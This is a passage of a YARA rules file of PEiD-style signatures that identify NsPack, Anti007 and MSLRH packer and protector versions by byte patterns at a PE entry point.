condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V30_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_34_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? FF FF 80 38 01 0F 84 42 02 00 00 C6 00 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_V14_LiuXingPing_: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B1 85 40 00 2D AA 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V25_V26_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_29_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8A 06 3C 00 74 12 8B F5 8D B5 ?? ?? FF FF 8A 06 3C 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPack_v37_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 8D ?? ?? ?? FF 80 39 01 0F 84 42 02 00 00 C6 01 01 8B C5 2B 85 ?? ?? ?? FF 89 85 ?? ?? ?? FF 01 85 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 01 06 55 56 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? ?? FF 85 C0 0F 84 69 03 00 00 89 85 ?? ?? ?? FF E8 00 00 00 00 5B B9 67 03 00 00 03 D9 50 53 E8 B0 02 00 00 5E 5D 8B 36 8B FD 03 BD ?? ?? ?? FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 34 01 13 8B 33 03 7B 04 57 51 53 FF B5 ?? ?? ?? FF FF B5 ?? ?? ?? FF 8B D6 8B CF 8B 85 ?? ?? ?? FF 05 AA 05 00 00 FF D0 5B 59 5F 83 F9 00 74 05 83 C3 08 EB C7 68 00 80 00 00 6A 00 FF B5 ?? ?? ?? FF FF 95 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 00 74 14 8A 1A 38 1F 75 E9 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 EB 0A 8A 5F 04 86 C4 C1 C0 10 86 C4 2B C7 03 C6 89 07 83 C7 05 80 EB E8 8B C3 E2 C6 E8 3A 01 00 00 8D 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n        $b = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPacK_V36_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_by_North_Star_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V27_V35_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 54 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v23_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_Liuxingping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 ?? ?? 40 00 2D ?? ?? 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v37_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 8D ?? ?? ?? FF 80 39 01 0F 84 42 02 00 00 C6 01 01 8B C5 2B 85 ?? ?? ?? FF 89 85 ?? ?? ?? FF 01 85 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 01 06 55 56 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? ?? FF 85 C0 0F 84 69 03 00 00 89 85 ?? ?? ?? FF E8 00 00 00 00 5B B9 67 03 00 00 03 D9 50 53 E8 B0 02 00 00 5E 5D 8B 36 8B FD 03 BD ?? ?? ?? FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 34 01 13 8B 33 03 7B 04 57 51 53 FF B5 ?? ?? ?? FF FF B5 ?? ?? ?? FF 8B D6 8B CF 8B 85 ?? ?? ?? FF 05 AA 05 00 00 FF D0 5B 59 5F 83 F9 00 74 05 83 C3 08 EB C7 68 00 80 00 00 6A 00 FF B5 ?? ?? ?? FF FF 95 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 00 74 14 8A 1A 38 1F 75 E9 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 EB 0A 8A 5F 04 86 C4 C1 C0 10 86 C4 2B C7 03 C6 89 07 83 C7 05 80 EB E8 8B C3 E2 C6 E8 3A 01 00 00 8D 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_nSPack_13_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_30_by_North_Star_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 55 F9 FF FF 66 8B 06 66 83 F8 00 74 15 8B F5 8D B5 7D F9 FF FF 66 8B 06 66 83 F8 01 0F 84 42 02 00 00 C6 06 01 8B D5 2B 95 11 F9 FF FF 89 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 10 00 00 00 00 00 00 ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_v032a_fake_nSPack_13_emadicius_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_by_North_Star_Liu_Xing_Ping_: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V36_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 83 38 01 0F 84 47 02 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_North_Star_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V34_V35_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 01 0F 84 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_Nort_Star_Software_urlwwwnsdsncom: PEiD\r\n{\r\n    strings:\r\n        $a = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 83 7E 08 00 75 02 EB 7A 8B 5E 08 03 DA 53 52 56 8D BD ?? ?? FF FF 03 7E 04 83 C6 0C 57 }\r\n        $b = { 83 F9 00 74 28 43 8D B5 ?? ?? FF FF 8B 16 56 51 53 52 56 FF 33 FF 73 04 8B 43 08 03 C2 50 FF 95 ?? ?? FF FF 5A 5B 59 5E 83 C3 0C E2 E1 61 9D E9 ?? ?? ?? FF 8B B5 ?? ?? FF FF 0B F6 0F 84 97 00 00 00 8B 95 ?? ?? FF FF 03 F2 83 3E 00 75 0E 83 7E 04 00 75 08 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPacK_Net_LiuXingPing_Sign_by_fly: PEiD\r\n{\r\n    strings:\r\n        $a = { 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 BB 01 47 65 74 53 79 73 74 65 6D 49 6E 66 6F 00 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C 00 00 5E 00 5F 43 6F 72 ?? ?? ?? 4D 61 69 6E 00 6D 73 63 6F 72 65 65 2E 64 6C 6C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSPack_2x3x_NET_North_StarLiu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { FF 25 A4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { FF 25 A4 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule NsPacK_V34_V35_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 85 ?? ?? ?? ?? 80 38 01 0F 84 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v37_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 8D ?? ?? ?? FF 80 39 01 0F 84 42 02 00 00 C6 01 01 8B C5 2B 85 ?? ?? ?? FF 89 85 ?? ?? ?? FF 01 85 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 01 06 55 56 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? ?? FF 85 C0 0F 84 69 03 00 00 89 85 ?? ?? ?? FF E8 00 00 00 00 5B B9 67 03 00 00 03 D9 50 53 E8 B0 02 00 00 5E 5D 8B 36 8B FD 03 BD ?? ?? ?? FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 34 01 13 8B 33 03 7B 04 57 51 53 FF B5 ?? ?? ?? FF FF B5 ?? ?? ?? FF 8B D6 8B CF 8B 85 ?? ?? ?? FF 05 AA 05 00 00 FF D0 5B 59 5F 83 F9 00 74 05 83 C3 08 EB C7 68 00 80 00 00 6A 00 FF B5 ?? ?? ?? FF FF 95 ?? ?? ?? FF 8D B5 ?? ?? ?? FF 8B 4E 08 8D 56 10 8B 36 8B FE 83 F9 00 74 3F 8A 07 47 2C E8 3C 01 77 F7 8B 07 80 7A 01 00 74 14 8A 1A 38 1F 75 E9 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 EB 0A 8A 5F 04 86 C4 C1 C0 10 86 C4 2B C7 03 C6 89 07 83 C7 05 80 EB E8 8B C3 E2 C6 E8 3A 01 00 00 8D 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_29_North_Star_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 ?? ?? FF FF 8B 06 83 F8 00 74 11 8D B5 ?? ?? FF FF 8B 06 83 F8 01 0F 84 4B 02 00 00 C7 06 01 00 00 00 8B D5 8B 85 ?? ?? FF FF 2B D0 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 8B 36 8B FD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V11_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V23_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V30_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? 2E C6 06 ?? ?? ?? E9 ?? ?? E8 ?? ?? 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V23_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_v31_North_Star_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? FF FF 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 ?? ?? FF FF 85 C0 0F 84 6A 03 00 00 89 85 ?? ?? FF FF E8 00 00 00 00 5B B9 68 03 00 00 03 D9 50 53 E8 B1 02 00 00 61 8B 36 8B FD 03 BD ?? ?? FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 36 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 ?? ?? FF FF FF B5 ?? ?? FF FF 8B D6 8B CF 8B 85 ?? ?? FF FF 05 AA 05 00 00 FF D0 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB C5 68 00 80 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V13_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V37_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D ?? ?? ?? ?? ?? 80 39 01 0F ?? ?? ?? 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V25_V26_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 47 65 74 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_14_by_North_Star_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NSPack_3x_Liu_Xing_Ping_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_31_Liu_Xing_Ping: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 10 8D 9D ?? ?? FF FF 8A 03 3C 01 0F 84 42 02 00 00 C6 03 01 8B D5 2B 95 ?? ?? FF FF 89 95 ?? ?? FF FF 01 95 ?? ?? FF FF 8D B5 ?? ?? FF FF 01 16 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPacK_V31_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V11_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 57 84 40 00 2D 50 84 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V10_V2X_NsPacK_Private_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 45 78 69 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V31_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D 83 ED 07 8D 9D ?? ?? ?? ?? 8A 03 3C 00 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V2X_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 6E 73 70 61 63 6B 24 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule Anti007_V10_V2X_NsPacK_Private: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 00 4C 6F 61 64 4C 69 62 72 61 72 79 41 00 00 00 47 65 74 50 72 6F 63 41 64 64 72 65 73 73 00 00 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 00 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 00 00 56 69 72 74 75 61 6C 46 72 65 65 00 00 00 45 78 69 74 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V2x_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 }\r\n        $b = { 6E 73 70 61 63 6B 24 40 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_nSPack_13_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D3 FE FF FF 8B 06 83 F8 00 74 11 8D B5 DF FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 61 9D EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule nSpack_V2x_LiuXingPing_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 07 00 00 00 2B E8 8D B5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule MSLRH_032a_fake_nSPack_13_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { E9 A6 00 00 00 B0 7B 40 00 78 60 40 00 7C 60 40 00 00 00 00 00 B0 3F 00 00 12 62 40 00 4E 65 6F 4C 69 74 65 20 45 78 65 63 75 74 61 62 6C 65 20 46 69 6C 65 20 43 6F 6D 70 72 65 73 73 6F 72 0D 0A 43 6F 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 2C 31 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule NsPack_V13_LiuXingPing: PEiD\r\n{\r\n    strings:\r\n        $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule 